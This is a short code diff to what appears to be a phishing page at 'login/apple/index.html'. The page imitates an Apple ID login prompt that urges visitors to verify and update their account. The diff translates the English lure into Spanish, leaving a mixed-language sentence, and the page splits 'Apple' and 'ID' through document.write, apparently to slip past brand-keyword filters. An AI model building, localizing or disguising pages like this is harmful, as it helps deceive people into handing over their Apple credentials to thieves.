--- a/login/apple/index.html
+++ b/login/apple/index.html
@@ -224,7 +224,7 @@
               <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT>
             </h2>
             <p class="intro">
-              Please login to verify & update your
+              Por favor ingresa a tu cuenta para verificar
               <SCRIPT TYPE="text/javascript"> document.write('Apple' + ' ID') </SCRIPT> account information.
             </p>
             <h2>Verificacion de cuenta.</h2>
